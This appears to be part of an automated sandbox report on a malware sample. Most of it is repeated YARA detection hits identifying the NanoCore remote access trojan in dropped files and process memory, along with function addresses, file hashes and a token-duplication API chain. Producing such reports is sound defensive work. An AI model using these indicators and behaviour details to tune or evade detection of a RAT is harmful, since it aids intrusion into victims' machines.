Source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 6240, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 6240, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001A626D	0_2_001A626D
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001983C0	0_2_001983C0
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001BC0B0	0_2_001BC0B0
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001930FC	0_2_001930FC
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001B0113	0_2_001B0113
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001A33D3	0_2_001A33D3
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001AF3CA	0_2_001AF3CA
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_0019E510	0_2_0019E510
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001BC55E	0_2_001BC55E
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001B0548	0_2_001B0548
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_0019F5C5	0_2_0019F5C5
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001C0654	0_2_001C0654
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001A364E	0_2_001A364E
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_00192692	0_2_00192692
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001A66A2	0_2_001A66A2
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001A589E	0_2_001A589E
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001AF8C6	0_2_001AF8C6
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001A397F	0_2_001A397F
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_0019E973	0_2_0019E973
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_0019DADD	0_2_0019DADD
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_0019BAD1	0_2_0019BAD1
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001B3CBA	0_2_001B3CBA
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001A6CDB	0_2_001A6CDB
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001AFCDE	0_2_001AFCDE
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_00195D7E	0_2_00195D7E
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_00193EAD	0_2_00193EAD
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001B3EE9	0_2_001B3EE9
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_0019DF12	0_2_0019DF12
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_008335F0	8_2_008335F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_008398F0	8_2_008398F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00842136	8_2_00842136
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0084A137	8_2_0084A137
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0085427D	8_2_0085427D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0087F3A6	8_2_0087F3A6
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_008398F0	8_2_008398F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00842508	8_2_00842508
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0087655F	8_2_0087655F
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00843721	8_2_00843721
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0083F730	8_2_0083F730
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0085088F	8_2_0085088F
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0084C8CE	8_2_0084C8CE
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_008428F0	8_2_008428F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00841903	8_2_00841903
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0087EAD5	8_2_0087EAD5
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_008AEA2B	8_2_008AEA2B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00853BA1	8_2_00853BA1
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00841D98	8_2_00841D98
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00850DE0	8_2_00850DE0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00872D2D	8_2_00872D2D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0087CE8D	8_2_0087CE8D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00874EB7	8_2_00874EB7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00851F2C	8_2_00851F2C
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 14_2_036AE471	14_2_036AE471
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 14_2_036AE480	14_2_036AE480
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 14_2_036ABBD4	14_2_036ABBD4

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_00876219 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

8_2_00876219

Source: mmuiqlcvwo.pif.0.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Section loaded: dxgidebug.dll	Jump to behavior

Source: Joe Sandbox View	Dropped File: C:\Users\user\33920049\mmuiqlcvwo.pif C9A2399CC1CE6F71DB9DA2F16E6C025BF6CB0F4345B427F21449CF927D627A40
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\RegSvcs.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50

Source: YdACOWCggQ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.43c9268.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.RegSvcs.exe.6290000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.RegSvcs.exe.6290000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.RegSvcs.exe.4834d2d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.RegSvcs.exe.4834d2d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.RegSvcs.exe.6290000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.RegSvcs.exe.6290000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.43c9268.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.3.mmuiqlcvwo.pif.43c9268.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.43c9268.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.RegSvcs.exe.6294629.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.RegSvcs.exe.6294629.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.4363658.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.RegSvcs.exe.60f0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.RegSvcs.exe.60f0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.442ee78.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.3.mmuiqlcvwo.pif.442ee78.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.442ee78.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.RegSvcs.exe.3834f58.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.RegSvcs.exe.3834f58.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.442ee78.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.RegSvcs.exe.4830704.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.RegSvcs.exe.4830704.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.43c9268.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.3.mmuiqlcvwo.pif.43c9268.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.43c9268.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.3.mmuiqlcvwo.pif.43c9268.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.3.mmuiqlcvwo.pif.43c9268.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.43c9268.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.RegSvcs.exe.482b8ce.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.RegSvcs.exe.482b8ce.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.RegSvcs.exe.482b8ce.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.RegSvcs.exe.4830704.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.RegSvcs.exe.4830704.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.43c9268.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.3.mmuiqlcvwo.pif.4363658.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.3.mmuiqlcvwo.pif.4363658.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.4363658.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
